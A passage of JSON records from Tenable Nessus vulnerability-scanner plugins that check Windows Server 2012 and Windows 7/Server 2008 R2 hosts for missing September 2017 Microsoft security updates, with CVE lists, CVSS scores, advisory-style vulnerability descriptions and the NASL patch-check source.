"impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0161", "CVE-2017-8529", "CVE-2017-8675", "CVE-2017-8676", "CVE-2017-8677", "CVE-2017-8678", "CVE-2017-8679", "CVE-2017-8680", "CVE-2017-8681", "CVE-2017-8682", "CVE-2017-8683", "CVE-2017-8684", "CVE-2017-8686", "CVE-2017-8687", "CVE-2017-8688", "CVE-2017-8692", "CVE-2017-8695", "CVE-2017-8699", "CVE-2017-8708", "CVE-2017-8709", "CVE-2017-8713", "CVE-2017-8714", "CVE-2017-8719", "CVE-2017-8720", "CVE-2017-8728", "CVE-2017-8733", "CVE-2017-8737", "CVE-2017-8741", "CVE-2017-8747", "CVE-2017-8749", "CVE-2017-8759"], "modified": "2021-11-30T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS17_SEP_4038799.NASL", "href": "https://www.tenable.com/plugins/nessus/103132", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(103132);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/11/30\");\n\n script_cve_id(\n \"CVE-2017-0161\",\n \"CVE-2017-8529\",\n \"CVE-2017-8675\",\n \"CVE-2017-8676\",\n \"CVE-2017-8677\",\n \"CVE-2017-8678\",\n \"CVE-2017-8679\",\n \"CVE-2017-8680\",\n \"CVE-2017-8681\",\n \"CVE-2017-8682\",\n \"CVE-2017-8683\",\n \"CVE-2017-8684\",\n \"CVE-2017-8686\",\n \"CVE-2017-8687\",\n \"CVE-2017-8688\",\n \"CVE-2017-8692\",\n \"CVE-2017-8695\",\n \"CVE-2017-8699\",\n \"CVE-2017-8708\",\n \"CVE-2017-8709\",\n \"CVE-2017-8713\",\n \"CVE-2017-8714\",\n \"CVE-2017-8719\",\n \"CVE-2017-8720\",\n \"CVE-2017-8728\",\n \"CVE-2017-8733\",\n \"CVE-2017-8737\",\n \"CVE-2017-8741\",\n \"CVE-2017-8747\",\n \"CVE-2017-8749\",\n \"CVE-2017-8759\"\n );\n script_xref(name:\"MSKB\", value:\"4038786\");\n script_xref(name:\"MSFT\", value:\"MS17-4038786\");\n 
script_xref(name:\"MSKB\", value:\"4038799\");\n script_xref(name:\"MSFT\", value:\"MS17-4038799\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"Windows Server 2012 September 2017 Security Updates\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4038786\nor cumulative update 4038799. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A race condition that could lead to a remote code\n execution vulnerability exists in NetBT Session Services\n when NetBT fails to maintain certain sequencing\n requirements. (CVE-2017-0161)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2017-8675)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory, allowing an attacker to\n retrieve information from a targeted system. By itself,\n the information disclosure does not allow arbitrary code\n execution; however, it could allow arbitrary code to be\n run if the attacker uses it in combination with another\n vulnerability. (CVE-2017-8676)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted embedded fonts. An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. 
An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2017-8682)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2017-8683)\n\n - A information disclosure vulnerability exists when the\n Windows GDI+ component improperly discloses kernel\n memory addresses. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. \n (CVE-2017-8677, CVE-2017-8680, CVE-2017-8681,\n CVE-2017-8684)\n\n - A memory corruption vulnerability exists in the Windows\n Server DHCP service when an attacker sends specially\n crafted packets to a DHCP failover server. An attacker\n who successfully exploited the vulnerability could\n either run arbitrary code on the DHCP failover server or\n cause the DHCP service to become nonresponsive. To\n exploit the vulnerability, an attacker could send a\n specially crafted packet to a DHCP server. However, the\n DHCP server must be set to failover mode for the attack\n to succeed. The security update addresses the\n vulnerability by correcting how DHCP failover servers\n handle network packets. (CVE-2017-8686)\n\n - An Information disclosure vulnerability exists in\n Windows kernel that could allow an attacker to retrieve\n information that could lead to a Kernel Address Space\n Layout Randomization (KASLR) bypass. An attacker who\n successfully exploited this vulnerability could retrieve\n the memory address of a kernel object. (CVE-2017-8687)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface+ (GDI+)\n handles objects in memory, allowing an attacker to\n retrieve information from a targeted system. 
By itself,\n the information disclosure does not allow arbitrary code\n execution; however, it could allow arbitrary code to be\n run if the attacker uses it in combination with another\n vulnerability. (CVE-2017-8688)\n\n - A remote code execution vulnerability exists due to the\n way Windows Uniscribe handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could take control of the affected system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2017-8692)\n\n - An information disclosure vulnerability exists when\n Windows Uniscribe improperly discloses the contents of\n its memory. An attacker who successfully exploited the\n vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document\n or by convincing a user to visit an untrusted webpage.\n The update addresses the vulnerability by correcting how\n Windows Uniscribe handles objects in memory.\n (CVE-2017-8695)\n\n - A remote code execution vulnerability exists when\n Windows Shell does not properly validate file copy\n destinations. An attacker who successfully exploited the\n vulnerability could run arbitrary code in the context of\n the current user.\n (CVE-2017-8699)\n\n - An information disclosure vulnerability exists when the\n Windows kernel fails to properly initialize a memory\n address, allowing an attacker to retrieve information\n that could lead to a Kernel Address Space Layout\n Randomization (KASLR) bypass. An attacker who\n successfully exploited this vulnerability could retrieve\n the base address of the kernel driver from a compromised\n process. 
(CVE-2017-8708)\n\n - An information disclosure vulnerability exists when\n Windows Hyper-V on a host operating system fails to\n properly validate input from an authenticated user on a\n guest operating system. (CVE-2017-8713)\n\n - A remote code execution vulnerability exists in the VM\n Host Agent Service of Remote Desktop Virtual Host role\n when it fails to properly validate input from an\n authenticated user on a guest operating system. To\n exploit the vulnerability, an attacker could issue a\n specially crafted certificate on the guest operating\n system that could cause the VM host agent service on the\n host operating system to execute arbitrary code. The\n Remote Desktop Virtual Host role is not enabled by\n default. An attacker who successfully exploited the\n vulnerability could execute arbitrary code on the host\n operating system. The security update addresses the\n vulnerability by correcting how VM host agent service\n validates guest operating system user input.\n (CVE-2017-8714)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2017-8678, CVE-2017-8679, CVE-2017-8709,\n CVE-2017-8719)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2017-8720)\n\n - A spoofing vulnerability exists when Internet Explorer\n improperly handles specific HTML content. An attacker\n who successfully exploited this vulnerability could\n trick a user into believing that the user was visiting a\n legitimate website. 
The specially crafted website could\n either spoof content or serve as a pivot to chain an\n attack with other vulnerabilities in web services. To\n exploit the vulnerability, the user must either browse\n to a malicious website or be redirected to it. In an\n email attack scenario, an attacker could send an email\n message in an attempt to convince the user to click a\n link to the malicious website. (CVE-2017-8733)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows PDF Library improperly handles objects\n in memory. The vulnerability could corrupt memory in a\n way that enables an attacker to execute arbitrary code\n in the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. \n (CVE-2017-8728, CVE-2017-8737)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browser JavaScript engines render content\n when handling objects in memory. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. (CVE-2017-8741)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. (CVE-2017-8747)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. (CVE-2017-8747,\n CVE-2017-8749)\n\n - A remote code execution vulnerability exists when\n Microsoft .NET Framework processes untrusted input. An\n attacker who successfully exploited this vulnerability\n in software using the .NET framework could take control\n of an affected system. 
An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2017-8759)\n \n - An information disclosure vulnerability exists in\n Microsoft browsers in the scripting engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website,\n to disclose files on a user's computer. (CVE-2017-8529)\");\n # https://support.microsoft.com/en-us/help/4038786/windows-server-2012-update-kb4038786\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?91b2bd74\");\n # https://support.microsoft.com/en-us/help/4038799/windows-server-2012-update-kb4038799\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?35364720\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4038786 or Cumulative update KB4038799.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-8759\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/09/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/09/12\");\n 
script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/09/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS17-09\";\nkbs = make_list('4038786', '4038799');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win8:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\n# Windows 8 EOL\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows 8\" >< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"6.2\",\n sp:0,\n rollup_date:\"09_2017\",\n bulletin:bulletin,\n rollup_kb_list:[4038786, 4038799])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, 
hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:34:39", "description": "The remote Windows host is missing security update 4038779 or cumulative update 4038777. It is, therefore, affected by multiple vulnerabilities :\n\n - A race condition that could lead to a remote code execution vulnerability exists in NetBT Session Services when NetBT fails to maintain certain sequencing requirements. (CVE-2017-0161)\n\n - A spoofing vulnerability exists in Microsoft's implementation of the Bluetooth stack. An attacker who successfully exploited this vulnerability could perform a man-in-the-middle attack and force a user's computer to unknowingly route traffic through the attacker's computer. The attacker can then monitor and read the traffic before sending it on to the intended recipient.\n (CVE-2017-8628)\n\n - An elevation of privilege vulnerability exists in Windows when the Windows kernel-mode driver fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. To exploit this vulnerability, an attacker would first have to log on to the system. An attacker could then run a specially crafted application that could exploit the vulnerability and take control of an affected system. The update addresses this vulnerability by correcting how the Windows kernel-mode driver handles objects in memory.\n (CVE-2017-8675)\n\n - An information disclosure vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in memory, allowing an attacker to retrieve information from a targeted system. 
By itself, the information disclosure does not allow arbitrary code execution; however, it could allow arbitrary code to be run if the attacker uses it in combination with another vulnerability. (CVE-2017-8676)\n\n - A remote code execution vulnerability exists when the Windows font library improperly handles specially crafted embedded fonts. An attacker who successfully exploited this vulnerability could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2017-8682)\n\n - An information disclosure vulnerability exists when the Microsoft Windows Graphics Component improperly handles objects in memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the user's system. (CVE-2017-8683)\n\n - An information disclosure vulnerability exists when the Windows GDI+ component improperly discloses kernel memory addresses. An attacker who successfully exploited the vulnerability could obtain information to further compromise the user's system.\n (CVE-2017-8677, CVE-2017-8680, CVE-2017-8681, CVE-2017-8684, CVE-2017-8685)\n\n - An information disclosure vulnerability exists in the Windows kernel that could allow an attacker to retrieve information that could lead to a Kernel Address Space Layout Randomization (KASLR) bypass. An attacker who successfully exploited this vulnerability could retrieve the memory address of a kernel object. (CVE-2017-8687)\n\n - An information disclosure vulnerability exists in the way that the Windows Graphics Device Interface+ (GDI+) handles objects in memory, allowing an attacker to retrieve information from a targeted system. By itself, the information disclosure does not allow arbitrary code execution; however, it could allow arbitrary code to be run if the attacker uses it in combination with another vulnerability. 
(CVE-2017-8688)\n\n - An information disclosure vulnerability exists when Windows Uniscribe improperly discloses the contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the user's system. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document or by convincing a user to visit an untrusted webpage.\n The update addresses the vulnerability by correcting how Windows Uniscribe handles objects in memory.\n (CVE-2017-8695)\n\n - A remote code execution vulnerability exists due to the way Windows Uniscribe handles objects in memory. An attacker who successfully exploited this vulnerability could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2017-8696)\n\n - A remote code execution vulnerability exists when Windows Shell does not properly validate file copy destinations. An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the current user.\n (CVE-2017-8699)\n\n - An information disclosure vulnerability exists when Windows Hyper-V on a host operating system fails to properly validate input from an authenticated user on a guest operating system. (CVE-2017-8707)\n\n - An information disclosure vulnerability exists when the Windows kernel fails to properly initialize a memory address, allowing an attacker to retrieve information that could lead to a Kernel Address Space Layout Randomization (KASLR) bypass. An attacker who successfully exploited this vulnerability could retrieve the base address of the kernel driver from a compromised process. (CVE-2017-8708)\n\n - An information disclosure vulnerability exists in the Windows System Information Console when it improperly parses XML input containing a reference to an external entity. 
An attacker who successfully exploited this vulnerability could read arbitrary files via an XML external entity (XXE) declaration. To exploit the vulnerability, an attacker could create a file containing specially crafted XML content and convince an authenticated user to open the file. The update addresses the vulnerability by modifying the way that the Windows System Information Console parses XML input.\n (CVE-2017-8710)\n\n - An information disclosure vulnerability exists when the Windows kernel improperly handles objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the user's system. (CVE-2017-8678, CVE-2017-8679, CVE-2017-8709, CVE-2017-8719)\n\n - An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts with full user rights. (CVE-2017-8720)\n\n - A spoofing vulnerability exists when Internet Explorer improperly handles specific HTML content. An attacker who successfully exploited this vulnerability could trick a user into believing that the user was visiting a legitimate website. The specially crafted website could either spoof content or serve as a pivot to chain an attack with other vulnerabilities in web services. To exploit the vulnerability, the user must either browse to a malicious website or be redirected to it. In an email attack scenario, an attacker could send an email message in an attempt to convince the user to click a link to the malicious website. (CVE-2017-8733)\n\n - An information disclosure vulnerability exists in Microsoft browsers due to improper parent domain verification in certain functionality. 
An attacker who successfully exploited the vulnerability could obtain specific information that is used in the parent domain.\n (CVE-2017-8736)\n\n - A remote code execution vulnerability exists in the way that Microsoft browser JavaScript engines render content when handling objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. (CVE-2017-8741, CVE-2017-8748)\n\n - A remote code execution vulnerability exists when Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. (CVE-2017-8747, CVE-2017-8749)\n\n - A remote code execution vulnerability exists when Microsoft browsers improperly access objects in memory.\n The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. (CVE-2017-8750)\n\n - An information disclosure vulnerability exists in Microsoft browsers in the scripting engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to disclose files on a user's computer. 
(CVE-2017-8529)", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-09-12T00:00:00", "type": "nessus", "title": "Windows 7 and Windows Server 2008 R2 September 2017 Security Updates", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0161", "CVE-2017-8529", "CVE-2017-8628", "CVE-2017-8675", "CVE-2017-8676", "CVE-2017-8677", "CVE-2017-8678", "CVE-2017-8679", "CVE-2017-8680", "CVE-2017-8681", "CVE-2017-8682", "CVE-2017-8683", "CVE-2017-8684", "CVE-2017-8685", "CVE-2017-8687", "CVE-2017-8688", "CVE-2017-8695", "CVE-2017-8696", "CVE-2017-8699", "CVE-2017-8707", "CVE-2017-8708", "CVE-2017-8709", "CVE-2017-8710", "CVE-2017-8719", "CVE-2017-8720", "CVE-2017-8733", "CVE-2017-8736", "CVE-2017-8741", "CVE-2017-8747", "CVE-2017-8748", "CVE-2017-8749", "CVE-2017-8750"], "modified": "2020-11-02T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS17_SEP_4038777.NASL", "href": "https://www.tenable.com/plugins/nessus/103127", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security 
Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\ninclude('compat.inc');\n\nif (description)\n{\n script_id(103127);\n script_version(\"1.23\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/11/02\");\n\n script_cve_id(\n \"CVE-2017-0161\",\n \"CVE-2017-8529\",\n \"CVE-2017-8628\",\n \"CVE-2017-8675\",\n \"CVE-2017-8676\",\n \"CVE-2017-8677\",\n \"CVE-2017-8678\",\n \"CVE-2017-8679\",\n \"CVE-2017-8680\",\n \"CVE-2017-8681\",\n \"CVE-2017-8682\",\n \"CVE-2017-8683\",\n \"CVE-2017-8684\",\n \"CVE-2017-8685\",\n \"CVE-2017-8687\",\n \"CVE-2017-8688\",\n \"CVE-2017-8695\",\n \"CVE-2017-8696\",\n \"CVE-2017-8699\",\n \"CVE-2017-8707\",\n \"CVE-2017-8708\",\n \"CVE-2017-8709\",\n \"CVE-2017-8710\",\n \"CVE-2017-8719\",\n \"CVE-2017-8720\",\n \"CVE-2017-8733\",\n \"CVE-2017-8736\",\n \"CVE-2017-8741\",\n \"CVE-2017-8747\",\n \"CVE-2017-8748\",\n \"CVE-2017-8749\",\n \"CVE-2017-8750\"\n );\n script_bugtraq_id(\n 98953,\n 100720,\n 100722,\n 100724,\n 100727,\n 100728,\n 100736,\n 100737,\n 100742,\n 100743,\n 100744,\n 100752,\n 100755,\n 100756,\n 100764,\n 100765,\n 100766,\n 100767,\n 100769,\n 100770,\n 100771,\n 100772,\n 100773,\n 100780,\n 100781,\n 100782,\n 100783,\n 100790,\n 100791,\n 100792,\n 100793,\n 100803,\n 100804\n );\n\n script_xref(name:\"MSKB\", value:\"4038779\");\n script_xref(name:\"MSFT\", value:\"MS17-4038779\");\n script_xref(name:\"MSKB\", value:\"4038777\");\n script_xref(name:\"MSFT\", value:\"MS17-4038777\");\n\n script_name(english:\"Windows 7 and Windows Server 2008 R2 September 2017 Security Updates\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4038779\nor cumulative update 4038777. 
It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A race condition that could lead to a remote code\n execution vulnerability exists in NetBT Session Services\n when NetBT fails to maintain certain sequencing\n requirements. (CVE-2017-0161)\n\n - A spoofing vulnerability exists in Microsoft's\n implementation of the Bluetooth stack. An attacker who\n successfully exploited this vulnerability could perform\n a man-in-the-middle attack and force a user's computer\n to unknowingly route traffic through the attacker's\n computer. The attacker can then monitor and read the\n traffic before sending it on to the intended recipient.\n (CVE-2017-8628)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights. To exploit\n this vulnerability, an attacker would first have to log\n on to the system. An attacker could then run a specially\n crafted application that could exploit the vulnerability\n and take control of an affected system. The update\n addresses this vulnerability by correcting how the\n Windows kernel-mode driver handles objects in memory.\n (CVE-2017-8675)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory, allowing an attacker to\n retrieve information from a targeted system. By itself,\n the information disclosure does not allow arbitrary code\n execution; however, it could allow arbitrary code to be\n run if the attacker uses it in combination with another\n vulnerability. (CVE-2017-8676)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted embedded fonts. 
An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2017-8682)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2017-8683)\n\n - A information disclosure vulnerability exists when the\n Windows GDI+ component improperly discloses kernel\n memory addresses. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system.\n (CVE-2017-8677, CVE-2017-8680, CVE-2017-8681,\n CVE-2017-8684, CVE-2017-8685)\n\n - An Information disclosure vulnerability exists in\n Windows kernel that could allow an attacker to retrieve\n information that could lead to a Kernel Address Space\n Layout Randomization (KASLR) bypass. An attacker who\n successfully exploited this vulnerability could retrieve\n the memory address of a kernel object. (CVE-2017-8687)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface+ (GDI+)\n handles objects in memory, allowing an attacker to\n retrieve information from a targeted system. By itself,\n the information disclosure does not allow arbitrary code\n execution; however, it could allow arbitrary code to be\n run if the attacker uses it in combination with another\n vulnerability. (CVE-2017-8688)\n\n - An information disclosure vulnerability exists when\n Windows Uniscribe improperly discloses the contents of\n its memory. An attacker who successfully exploited the\n vulnerability could obtain information to further\n compromise the users system. 
There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document\n or by convincing a user to visit an untrusted webpage.\n The update addresses the vulnerability by correcting how\n Windows Uniscribe handles objects in memory.\n (CVE-2017-8695)\n\n - A remote code execution vulnerability exists due to the\n way Windows Uniscribe handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could take control of the affected system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2017-8696)\n\n - A remote code execution vulnerability exists when\n Windows Shell does not properly validate file copy\n destinations. An attacker who successfully exploited the\n vulnerability could run arbitrary code in the context of\n the current user.\n (CVE-2017-8699)\n\n - An information disclosure vulnerability exists when\n Windows Hyper-V on a host operating system fails to\n properly validate input from an authenticated user on a\n guest operating system. (CVE-2017-8707)\n\n - An information disclosure vulnerability exists when the\n Windows kernel fails to properly initialize a memory\n address, allowing an attacker to retrieve information\n that could lead to a Kernel Address Space Layout\n Randomization (KASLR) bypass. An attacker who\n successfully exploited this vulnerability could retrieve\n the base address of the kernel driver from a compromised\n process. (CVE-2017-8708)\n\n - An information disclosure vulnerability exists in the\n Windows System Information Console when it improperly\n parses XML input containing a reference to an external\n entity. An attacker who successfully exploited this\n vulnerability could read arbitrary files via an XML\n external entity (XXE) declaration. 
To exploit the\n vulnerability, an attacker could create a file\n containing specially crafted XML content and convince an\n authenticated user to open the file. The update\n addresses the vulnerability by modifying the way that\n the Windows System Information Console parses XML input.\n (CVE-2017-8710)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2017-8678, CVE-2017-8679, CVE-2017-8709,\n CVE-2017-8719)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2017-8720)\n\n - A spoofing vulnerability exists when Internet Explorer\n improperly handles specific HTML content. An attacker\n who successfully exploited this vulnerability could\n trick a user into believing that the user was visiting a\n legitimate website. The specially crafted website could\n either spoof content or serve as a pivot to chain an\n attack with other vulnerabilities in web services. To\n exploit the vulnerability, the user must either browse\n to a malicious website or be redirected to it. In an\n email attack scenario, an attacker could send an email\n message in an attempt to convince the user to click a\n link to the malicious website. (CVE-2017-8733)\n\n - An information disclosure vulnerability exists in\n Microsoft browsers due to improper parent domain\n verification in certain functionality. 
An attacker who\n successfully exploited the vulnerability could obtain\n specific information that is used in the parent domain.\n (CVE-2017-8736)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browser JavaScript engines render content\n when handling objects in memory. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. (CVE-2017-8741, CVE-2017-8748)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. (CVE-2017-8747,\n CVE-2017-8749)\n\n - A remote code execution vulnerability exists when\n Microsoft browsers improperly access objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. (CVE-2017-8750)\n\n - An information disclosure vulnerability exists in\n Microsoft browsers in the scripting engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website,\n to disclose files on a user's computer. 
